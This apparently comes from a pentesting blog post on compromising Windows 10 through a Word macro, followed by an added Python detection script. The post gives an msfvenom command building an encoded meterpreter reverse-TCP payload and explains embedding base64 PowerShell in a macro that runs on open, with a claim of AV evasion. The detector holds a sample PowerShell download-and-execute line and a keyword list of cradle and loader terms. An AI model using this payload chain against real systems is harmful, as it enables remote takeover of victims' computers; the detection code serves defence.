
[Pentesting] Windows exploit with Word Macro

Windows Exploit with Word Macro


1. Exploit Info

A Microsoft Word file is used to compromise the victim's computer. Malicious VBA code is inserted into a Word macro; when the victim opens the file, the code runs and starts a reverse shell.


2. Target Information

- Victim :

IP Address : 192.168.56.132

Mail : mail.naver.com

OS : Windows 10 pro x86-64 kor

MS Word ver : word 2016 professional plus

AV : yes ( with virustotal.com )


- Attacker :

IP Address : 192.168.56.129

OS : Kali Linux v2016.01 x86-64


3. Exploit

This time, we will use the macro feature to execute malicious code (a reverse shell).

That means any target running an MS Office version that supports macros can be attacked this way.


1. First, we need to make our own reverse shell payload with 'msfvenom'

[ Options : msfvenom -p windows/meterpreter/reverse_tcp 192.168.0.35 4444 --platform windows --smallest StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 -f c ]

In short, we make a reverse shell payload encoded with shikata_ga_nai (a polymorphic XOR encoder).


2. Second, we use a custom script that generates PowerShell code. That code contains the payload above, encoded with base64.


The macro.txt data looks like the example below..

Just put the macro.txt data into the macro of any .doc file.

Then, when the victim simply opens that .doc file, the code is executed automatically.


3. Before we attack with this file, let's check it against AVs and the mail virus detector.

The AVs report no problems.


4. If the code executes normally, we get the victim's shell, as shown below.



- End of PoC -
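As an added example from the defender's side (not part of the original post), this Python script shows how the chain described above, WINWORD.EXE spawning PowerShell with a base64-encoded command, appears in process-creation telemetry and how to decode and triage it. Event fields follow the Sysmon Event ID 1 naming; every event and the encoded command are constructed samples, not data from the post.

```python
import base64
import re

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
# The encoded command is a harmless constructed download-cradle string, not the page's payload.
def encode_ps(script: str) -> str:
    # powershell -EncodedCommand expects base64 over UTF-16LE text.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": WINWORD, "Image": PS,
     "CommandLine": "powershell -nop -w hidden -enc "
                    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},
    {"ParentImage": WINWORD, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c whoami"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# -e / -enc / -EncodedCommand followed by a base64 argument (PowerShell accepts prefixes).
ENC_FLAG = re.compile(r"-(?:e|en|enc|ec|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Keywords typical of download-and-execute cradles and in-memory shellcode loaders.
KEYWORDS = {"iex": r"\biex\b", "invoke-expression": r"invoke-expression",
            "downloadstring": r"downloadstring", "frombase64string": r"frombase64string",
            "virtualalloc": r"virtualalloc"}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(event: dict) -> dict:
    """Flag Office-spawned shells and inspect encoded PowerShell for cradle/loader keywords."""
    decoded = decode_encoded_command(event["CommandLine"])
    office_chain = basename(event["ParentImage"]) in OFFICE_APPS and basename(event["Image"]) in SHELLS
    hits = [name for name, pat in KEYWORDS.items() if decoded and re.search(pat, decoded, re.I)]
    return {"office_spawned_shell": office_chain, "decoded_command": decoded, "keywords": hits}

def alerts(events) -> list:
    """Events worth escalating: an Office->shell chain, or encoded PowerShell with suspicious keywords."""
    return [e for e in events if analyze(e)["office_spawned_shell"] or analyze(e)["keywords"]]
```

Running `alerts(SAMPLE_EVENTS)` returns the two WINWORD-parented events and leaves the explorer.exe-launched script alone; the decoded command is what an analyst would paste into a sandbox or ticket.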


4. Analysis

Converting the reverse shell payload into PowerShell code

Reference : https://github.com/trustedsec/unicorn